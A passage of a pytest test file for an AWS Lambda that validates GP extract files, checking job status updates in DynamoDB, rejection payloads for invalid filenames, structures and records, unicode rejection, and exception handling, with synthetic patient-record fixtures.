        assert j.PracticeCode == ParseStatus.NOT_PARSED.value
        assert j.StatusId == JobStatus.PENDING.value
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_update_job_status(
    lambda_handler,
    lambda_context,
    upload_valid_file,
    create_dynamodb_table,
    create_mesh_bucket,
):
    """update_job_status() overwrites the job row's StatusId.

    Fix: the original asserted inside ``for j in query`` — an empty query
    result made the test pass vacuously. The result is now materialized and
    required to be non-empty.
    """
    app = lambda_handler
    app.job_id = JOB_ID
    app.input_file = f"inbound/{VALID_FILE}"
    app.create_initial_job()
    app.update_job_status("TESTING")

    jobs = list(Jobs.IdIndex.query(JOB_ID))
    assert jobs, "expected the job row to exist after create_initial_job()"
    for j in jobs:
        assert j.StatusId == "TESTING"
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_parse_gp_extract(
    lambda_handler,
    lambda_context,
    upload_valid_file,
    create_dynamodb_table,
    create_mesh_bucket,
):
    """parse_gp_extract() returns the practice code and record count."""
    app = lambda_handler
    assert app.parse_gp_extract(INPUT_BUCKET, VALID_FILE) == ("A82024", 2)
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_process_invalid_filename_message(
    lambda_handler,
    lambda_context,
    invalid_file_event,
    create_rejection_bucket,
    create_dynamodb_table,
):
    """An InvalidFilename exception is rendered into the rejection payload."""
    app = lambda_handler
    app.job_id = JOB_ID
    app.input_file = f"inbound/{INVALID_FILE}"
    app.upload_date = "2021-03-28 13:40:00"

    msg = InvalidFilename({"message": ["File date must not be older than 14 days"]})
    expected = {
        "file": "inbound/inbound/A12023_GPR4LNA1.CSB",
        "upload_date": "2021-03-28 13:40:00",
        "error_type": "INVALID_FILENAME",
        "message": ["File date must not be older than 14 days"],
    }
    assert app.process_invalid_message(msg) == expected
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_process_invalid_structure_message(
    lambda_handler,
    lambda_context,
    invalid_file_event,
    create_rejection_bucket,
    create_dynamodb_table,
):
    """An InvalidStructure exception is rendered into the rejection payload."""
    app = lambda_handler
    app.job_id = JOB_ID
    app.input_file = f"inbound/{INVALID_FILE}"
    app.upload_date = "2021-03-28 13:40:00"

    msg = InvalidStructure(r"Header must be 503\*")
    expected = {
        "file": "inbound/inbound/A12023_GPR4LNA1.CSB",
        "upload_date": "2021-03-28 13:40:00",
        "error_type": "INVALID_STRUCTURE",
        "message": ["Header must be 503\\*"],
    }
    assert app.process_invalid_message(msg) == expected
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_process_invalid_gp_extract_message(
    lambda_handler,
    lambda_context,
    invalid_file_event,
    create_rejection_bucket,
    create_dynamodb_table,
):
    """An InvalidGPExtract exception is rendered into a rejection payload
    that echoes the invalid records and counts them."""
    app = lambda_handler
    app.job_id = JOB_ID
    app.input_file = f"inbound/{INVALID_FILE}"
    app.upload_date = "2021-03-28 13:40:00"
    # Two malformed DOW record pairs; the same literals are repeated in the
    # expected "message" below, so the payload must echo them verbatim.
    invalid_records = [
        """DOW~1~~~~~~~~KOF~~MR~1~20020101~FLAT A~THE STREET
DOW~2~~EAST~~E1 1AA~~3~~~""",
        """
DOW~1~1111111,1234~LNA~20200406~1340~1557494~1234567891~SAM~JACK~FOE~MISS~2~20120211~FLAT B~THE STREET
DOW~2~~EAST~~E1 1AA~~~~3%~""",
    ]
    msg = InvalidGPExtract({"total_records": 10, "invalid_records": invalid_records})
    expected_response = {
        "file": "inbound/inbound/A12023_GPR4LNA1.CSB",
        "upload_date": "2021-03-28 13:40:00",
        "error_type": "INVALID_RECORDS",
        "total_records": 10,
        # total_invalid_records is derived from the two records above.
        "total_invalid_records": 2,
        "message": [
            """DOW~1~~~~~~~~KOF~~MR~1~20020101~FLAT A~THE STREET
DOW~2~~EAST~~E1 1AA~~3~~~""",
            """
DOW~1~1111111,1234~LNA~20200406~1340~1557494~1234567891~SAM~JACK~FOE~MISS~2~20120211~FLAT B~THE STREET
DOW~2~~EAST~~E1 1AA~~~~3%~""",
        ],
    }
    actual_response = app.process_invalid_message(msg)
    assert actual_response == expected_response
# Unicode
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_file_with_one_unicode_char_returns_invalid_record_error(
    lambda_handler,
    lambda_context,
    invalid_unicode_single_character_file_event,
    create_mesh_bucket,
    create_rejection_bucket,
    create_dynamodb_table,
):
    """A file containing a single unicode character is rejected as INVALID_RECORDS.

    Checks both the lambda response and the rejection report(s) written to the
    rejection bucket.
    """
    expected_error = "INVALID_RECORDS"
    expected_message = "Lambda application stopped gp extract input file rejected, rejected file handled"
    expected_file = FILE_WITH_ONE_UNICODE_CHARACTER

    app = lambda_handler
    response = app.main(invalid_unicode_single_character_file_event, lambda_context)

    # These assertions come from the response alone and do not depend on S3 state.
    assert response["message"] == expected_message
    assert response["file"] == expected_file

    # Previously, an empty rejection bucket left `actual_error` unbound and the
    # test died with a NameError; assert explicitly that a report was written,
    # and check every report rather than only the last one listed.
    client = boto3.client("s3")
    contents = client.list_objects_v2(Bucket=REJECTION_BUCKET).get("Contents", [])
    assert contents, "no rejection report was written to the rejection bucket"
    for obj in contents:
        rejection_file = client.get_object(Bucket=REJECTION_BUCKET, Key=str(obj["Key"]))
        json_content = json.loads(rejection_file["Body"].read().decode("utf-8"))
        assert json_content["error_type"] == expected_error
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_file_with_multiple_unicode_char_returns_invalid_record_error(
    lambda_handler,
    lambda_context,
    invalid_unicode_multiple_character_file_event,
    create_mesh_bucket,
    create_rejection_bucket,
    create_dynamodb_table,
):
    """A file containing multiple unicode characters is rejected as INVALID_RECORDS.

    Checks both the lambda response and the rejection report(s) written to the
    rejection bucket.
    """
    expected_error = "INVALID_RECORDS"
    expected_message = "Lambda application stopped gp extract input file rejected, rejected file handled"
    expected_file = FILE_WITH_MULTIPLE_UNICODE_CHARACTERS

    app = lambda_handler
    response = app.main(invalid_unicode_multiple_character_file_event, lambda_context)

    # These assertions come from the response alone and do not depend on S3 state.
    assert response["message"] == expected_message
    assert response["file"] == expected_file

    # Previously, an empty rejection bucket left `actual_error` unbound and the
    # test died with a NameError; assert explicitly that a report was written,
    # and check every report rather than only the last one listed.
    client = boto3.client("s3")
    contents = client.list_objects_v2(Bucket=REJECTION_BUCKET).get("Contents", [])
    assert contents, "no rejection report was written to the rejection bucket"
    for obj in contents:
        rejection_file = client.get_object(Bucket=REJECTION_BUCKET, Key=str(obj["Key"]))
        json_content = json.loads(rejection_file["Body"].read().decode("utf-8"))
        assert json_content["error_type"] == expected_error
# Exceptions
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_create_job_no_db_exception(
    lambda_handler,
    lambda_context,
    upload_valid_file,
    create_mesh_bucket,
):
    """create_initial_job raises PutError when no DynamoDB table fixture exists."""
    handler = lambda_handler
    handler.job_id = JOB_ID
    handler.input_file = f"inbound/{VALID_FILE}"

    with pytest.raises(PutError):
        handler.create_initial_job()
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_update_job_info_query_exception(
    lambda_handler,
    lambda_context,
    upload_valid_file,
    create_mesh_bucket,
):
    """update_job_info raises QueryError for a job id with no backing record."""
    handler = lambda_handler
    handler.job_id = "invalid"
    handler.input_file = f"inbound/{VALID_FILE}"

    with pytest.raises(QueryError):
        handler.update_job_info("test", "test")
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_update_job_status_query_exception(
    lambda_handler,
    lambda_context,
    upload_valid_file,
    create_mesh_bucket,
):
    """update_job_status raises QueryError for a job id with no backing record."""
    handler = lambda_handler
    handler.job_id = "invalid"
    handler.input_file = f"inbound/{VALID_FILE}"

    with pytest.raises(QueryError):
        handler.update_job_status("test", "test")
def test_validate_and_forward_file_cleanup_exception(
    lambda_handler,
    lambda_context,
    create_dynamodb_table,
):
    """cleanup_files raises when the input bucket was never created."""
    with pytest.raises(Exception):
        lambda_handler.cleanup_files(INPUT_BUCKET, VALID_FILE)
def test_validate_and_forward_raises_key_error(lambda_handler, lambda_context):
    """main raises KeyError when the event lacks the keys it expects."""
    with pytest.raises(KeyError):
        lambda_handler.main({"error": "error"}, lambda_context)
| 31.50533
| 313
| 0.732945
| 1,976
| 14,776
| 5.119939
| 0.099696
| 0.048829
| 0.018187
| 0.022734
| 0.848077
| 0.815855
| 0.795789
| 0.780765
| 0.759613
| 0.759613
| 0
| 0.056775
| 0.170344
| 14,776
| 468
| 314
| 31.57265
| 0.768497
| 0.001218
| 0
| 0.754667
| 0
| 0.002667
| 0.163762
| 0.04325
| 0
| 0
| 0
| 0
| 0.090667
| 1
| 0.050667
| false
| 0
| 0.024
| 0
| 0.074667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.